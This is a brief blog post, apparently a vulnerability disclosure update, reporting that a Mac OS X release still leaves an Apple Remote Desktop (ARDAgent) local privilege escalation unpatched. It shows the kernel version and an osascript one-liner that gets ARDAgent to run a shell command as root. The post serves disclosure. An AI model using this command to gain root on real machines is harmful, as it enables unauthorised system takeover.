The release includes security fixes too. But, the local privilege escalation exploit affecting Apple Remote Desktop that we blogged about is still there:
$ uname -a
Darwin mymac.local 9.4.0 Darwin Kernel Version 9.4.0: Mon Jun 9 19:30:53 PDT 2008; root:xnu-1228.5.20~1/RELEASE_I386 i386 i386
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root
0 comments:
Post a Comment